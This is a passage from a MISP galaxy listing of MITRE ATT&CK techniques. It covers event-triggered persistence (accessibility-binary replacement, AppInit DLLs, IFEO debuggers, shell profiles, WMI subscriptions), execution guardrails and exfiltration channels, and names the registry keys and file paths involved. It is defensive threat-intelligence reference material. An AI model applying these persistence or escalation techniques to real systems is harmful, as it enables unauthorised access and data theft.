For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. [Tilbury 2014]

Other accessibility features exist that may also be leveraged in a similar fashion: [DEFCON2016 Sticky Keys][Narrator Accessibility Abuse]

  • On-Screen Keyboard: C:\Windows\System32\osk.exe
  • Magnifier: C:\Windows\System32\Magnify.exe
  • Narrator: C:\Windows\System32\Narrator.exe
  • Display Switcher: C:\Windows\System32\DisplaySwitch.exe
  • App Switcher: C:\Windows\System32\AtBroker.exe
Internal MISP references

UUID 9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba which can be used as unique global reference for Accessibility Features in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.008
Related clusters

To see the related clusters, click here.

AppCert DLLs

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\ are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. [Elastic Process Injection July 2017]

Similar to Process Injection, this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.

Internal MISP references

UUID 4216058d-0912-4ff3-a7fd-dd7a7b346c96 which can be used as unique global reference for AppCert DLLs in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.009
Related clusters

To see the related clusters, click here.

AppInit DLLs

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. [Elastic Process Injection July 2017]

Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. [AppInit Registry] Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity.

The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. [AppInit Secure Boot]

Internal MISP references

UUID 36b58363-ca6a-4614-bf6f-bfaecafedb5f which can be used as unique global reference for AppInit DLLs in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.010
Related clusters

To see the related clusters, click here.

Application Shimming

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. [Elastic Process Injection July 2017]

Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

  • %WINDIR%\AppPatch\sysmain.sdb and
  • hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb

Custom databases are stored in:

  • %WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom and
  • hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom

To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).

Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. [FireEye Application Shimming] Shims can also be abused to establish persistence by continuously being invoked by affected programs.

Internal MISP references

UUID efbbe9d1-274c-4383-9c6c-44bd4eca1829 which can be used as unique global reference for Application Shimming in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.011
Related clusters

To see the related clusters, click here.

Change Default File Association

Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.[Microsoft Change Default Programs][Microsoft File Handlers][Microsoft Assoc Oct 2017] Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under HKEY_CLASSES_ROOT.[extension], for example HKEY_CLASSES_ROOT.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example:

  • HKEY_CLASSES_ROOT\txtfile\shell\open\command
  • HKEY_CLASSES_ROOT\txtfile\shell\print\command
  • HKEY_CLASSES_ROOT\txtfile\shell\printto\command

The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.[TrendMicro TROJ-FAKEAV OCT 2012]

Internal MISP references

UUID 9cfbe3ba-957e-49fd-9494-9870e5d0ae16 which can be used as unique global reference for Change Default File Association in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.001
Related clusters

To see the related clusters, click here.

Component Object Model Hijacking

Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.[Microsoft Component Object Model] References to various COM objects are stored in the Registry.

Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.[GDATA COM Hijacking] An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.

Internal MISP references

UUID 3e1ef5ba-6426-4fe0-ad48-78557667d680 which can be used as unique global reference for Component Object Model Hijacking in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.015
Related clusters

To see the related clusters, click here.

Emond

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a Launch Daemon that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.

The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the Launch Daemon configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.[xorrior emond Jan 2018][magnusviri emond Apr 2016][sentinelone macos persist Jun 2019]

Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.[xorrior emond Jan 2018][magnusviri emond Apr 2016][sentinelone macos persist Jun 2019] Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the Launch Daemon service.

Internal MISP references

UUID 7f9dbafd-4c7e-4bd9-8aff-c2a800743a07 which can be used as unique global reference for Emond in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.014
Related clusters

To see the related clusters, click here.

Image File Execution Options Injection

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). [Microsoft Dev Blog IFEO Mar 2010]

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. [Microsoft GFlags Mar 2017] IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. [Microsoft Dev Blog IFEO Mar 2010]

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). [Microsoft Silent Process Exit NOV 2017] [Oddvar Moe IFEO APR 2018] Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. [Microsoft Silent Process Exit NOV 2017] [Oddvar Moe IFEO APR 2018]

Similar to Accessibility Features, on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with Remote Desktop Protocol will cause the "debugger" program to be executed with SYSTEM privileges. [Tilbury 2014]

Similar to Process Injection, these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. [Elastic Process Injection July 2017] Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.

Malware may also use IFEO to Impair Defenses by registering invalid debuggers that redirect and effectively disable various system and security applications. [FSecure Hupigon] [Symantec Ushedix June 2008]

Internal MISP references

UUID 91d813d3-c17c-4c4c-b86e-0667f669a2f4 which can be used as unique global reference for Image File Execution Options Injection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.012
Related clusters

To see the related clusters, click here.

Installer Packages

Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.[Installer Package Scripting Rich Trouton]

Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS postinstall scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a Launch Daemon) with the elevated permissions.[Application Bundle Manipulation Brandon Dalton][wardle evilquest parti]

Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include preinst, postinst, prerm, postrm scripts and run as root when executed.

For Windows, the Microsoft Installer services uses .msi files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged Prebuild and Postbuild events to run commands before or after a build when installing .msi files.[Windows AppleJeus GReAT][Debian Manual Maintainer Scripts]

Internal MISP references

UUID 8b8c0f91-17fb-41fe-905c-9cbf45593877 which can be used as unique global reference for Installer Packages in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.016
Related clusters

To see the related clusters, click here.

LC_LOAD_DYLIB Addition

Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.[Writing Bad Malware for OSX] There are tools available to perform these changes.

Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.[Malware Persistence on OS X]

Internal MISP references

UUID cd52d338-ba23-43c8-975d-4db29aa96598 which can be used as unique global reference for LC_LOAD_DYLIB Addition in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.006
Related clusters

To see the related clusters, click here.

Netsh Helper DLL

Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.[TechNet Netsh] The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.

Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.[Github Netsh Helper CS Beacon][Demaske Netsh Persistence]

Internal MISP references

UUID b2cae050-4916-44c0-a6a3-3fa257145872 which can be used as unique global reference for Netsh Helper DLL in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.007
Related clusters

To see the related clusters, click here.

PowerShell Profile

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments.

PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. [Microsoft About Profiles]

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the -NoProfile flag is used when it is launched. [ESET Turla PowerShell May 2019]

An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. [Wits End and Shady PowerShell Profiles]

Internal MISP references

UUID 6e65f84b-cfad-49ce-9072-f2966dc02f56 which can be used as unique global reference for PowerShell Profile in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.013
Related clusters

To see the related clusters, click here.

Screensaver

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.[Wikipedia Screensaver] The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations.

The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:

  • SCRNSAVE.exe - set to malicious PE path
  • ScreenSaveActive - set to '1' to enable the screensaver
  • ScreenSaverIsSecure - set to '0' to not require a password to unlock
  • ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.[ESET Gazer Aug 2017]

Internal MISP references

UUID 3f9cd334-0b86-478f-97fa-c3aedd8035d8 which can be used as unique global reference for Screensaver in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.002
Related clusters

To see the related clusters, click here.

Trap

Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.

Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.[Trap Manual][Cyberciti Trap Statements]

Internal MISP references

UUID 82c07e34-9f67-4f4e-a513-c22a17b508e5 which can be used as unique global reference for Trap in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.005
Related clusters

To see the related clusters, click here.

Unix Shell Configuration Modification

Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.

Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.[intezer-kaiji-malware][bencane blog bashrc] These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.[anomali-rocke-tactics][Linux manual bash invocation] Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.[Tsunami][anomali-rocke-tactics][anomali-linux-rabbit][Magento] Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session.

For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.[ScriptingOSX zsh][PersistentJXA_leopitt][code_persistence_zsh][macOS MS office sandbox escape] The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.

Internal MISP references

UUID cc5ae19f-981d-4004-bb74-260b8ebad73a which can be used as unique global reference for Unix Shell Configuration Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.004
Related clusters

To see the related clusters, click here.

Windows Management Instrumentation Event Subscription

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime.[Mandiant M-Trends 2015]

Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.[FireEye WMI SANS 2015][FireEye WMI 2015] Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.[Dell WMI Persistence][Microsoft MOF May 2018]

WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.

Internal MISP references

UUID 043ffb62-dacd-4e21-9c86-b31826176283 which can be used as unique global reference for Windows Management Instrumentation Event Subscription in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.003
Related clusters

To see the related clusters, click here.

Event Triggered Execution

Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.[Backdooring an AWS account][Varonis Power Automate Data Exfiltration][Microsoft DART Case Report 001]

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.[FireEye WMI 2015][Malware Persistence on OS X][amnesia malware]

Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.

Internal MISP references

UUID e1e42979-d3cd-461b-afc4-a6373cbf97ba which can be used as unique global reference for Event Triggered Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Environmental Keying

Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of Execution Guardrails that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.[EK Clueless Agents]

Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.[Kaspersky Gauss Whitepaper][Proofpoint Router Malvertising][EK Impeding Malware Analysis][Environmental Keyed HTA][Ebowla: Genetic Malware] By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.[Kaspersky Gauss Whitepaper][Ebowla: Genetic Malware] These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).

Similar to Obfuscated Files or Information, adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.[Kaspersky Gauss Whitepaper][EK Impeding Malware Analysis][Environmental Keyed HTA][Ebowla: Genetic Malware][Demiguise Guardrail Router Logo] By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.[Kaspersky Gauss Whitepaper] This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.

Like other Execution Guardrails, environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical Virtualization/Sandbox Evasion. While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.

Internal MISP references

UUID ac10844f-e4ab-44a2-97b4-3d74a1fc046c which can be used as unique global reference for Environmental Keying in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1480.001
Related clusters

To see the related clusters, click here.

Execution Guardrails

Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.[FireEye Kevin Mandia Guardrails] Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.[FireEye Outlook Dec 2019]

Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical Virtualization/Sandbox Evasion. While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.

Internal MISP references

UUID aca9cbac-5c11-4050-8d9c-2a947c89a1e8 which can be used as unique global reference for Execution Guardrails in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin.

Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.

Internal MISP references

UUID b27b273b-77e7-4243-8b48-a735857c0708 which can be used as unique global reference for Exfiltration Over Asymmetric Encrypted Non-C2 Protocol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1048.002
Related clusters

To see the related clusters, click here.

Exfiltration Over Symmetric Encrypted Non-C2 Protocol

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data.

Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP).

Internal MISP references

UUID 848e3552-e89d-4981-a5a5-eaf610e6eb37 which can be used as unique global reference for Exfiltration Over Symmetric Encrypted Non-C2 Protocol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1048.001
Related clusters

To see the related clusters, click here.

Exfiltration Over Unencrypted Non-C2 Protocol

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.[copy_cmd_cisco]

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.

Internal MISP references

UUID 27041aa4-13e7-4d84-b1c7-02047beb5534 which can be used as unique global reference for Exfiltration Over Unencrypted Non-C2 Protocol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1048.003
Related clusters

To see the related clusters, click here.

Exfiltration Over Alternative Protocol

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.

Exfiltration Over Alternative Protocol can be done using various common operating system utilities such as Net/SMB or FTP.[Palo Alto OilRig Oct 2016] On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.[20 macOS Common Tools and Techniques]

Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or Cloud API.

Internal MISP references

UUID 192d25ea-bae1-48e4-88de-e0acd481ab88 which can be used as unique global reference for Exfiltration Over Alternative Protocol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration Over C2 Channel

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

Internal MISP references

UUID 89203cae-d3f1-4eef-9b5a-29042eb05d19 which can be used as unique global reference for Exfiltration Over C2 Channel in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration Over Bluetooth

Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.

Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

Internal MISP references

UUID 38cfe608-a7e3-4e4f-9e2d-6a6ab14946f9 which can be used as unique global reference for Exfiltration Over Bluetooth in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1011.001
Related clusters

To see the related clusters, click here.

Exfiltration Over Other Network Medium

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

Internal MISP references

UUID d8541e2d-6bdd-4ec0-95c4-c0f657502d5f which can be used as unique global reference for Exfiltration Over Other Network Medium in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration over USB

Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

Internal MISP references

UUID f424dade-21f3-4269-9940-ce64d93b97c4 which can be used as unique global reference for Exfiltration over USB in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1052.001
Related clusters

To see the related clusters, click here.

Exfiltration Over Physical Medium

Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

Internal MISP references

UUID 36e0e8c0-ed8c-42b5-8bbf-b7cb322bc26f which can be used as unique global reference for Exfiltration Over Physical Medium in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration Over Webhook

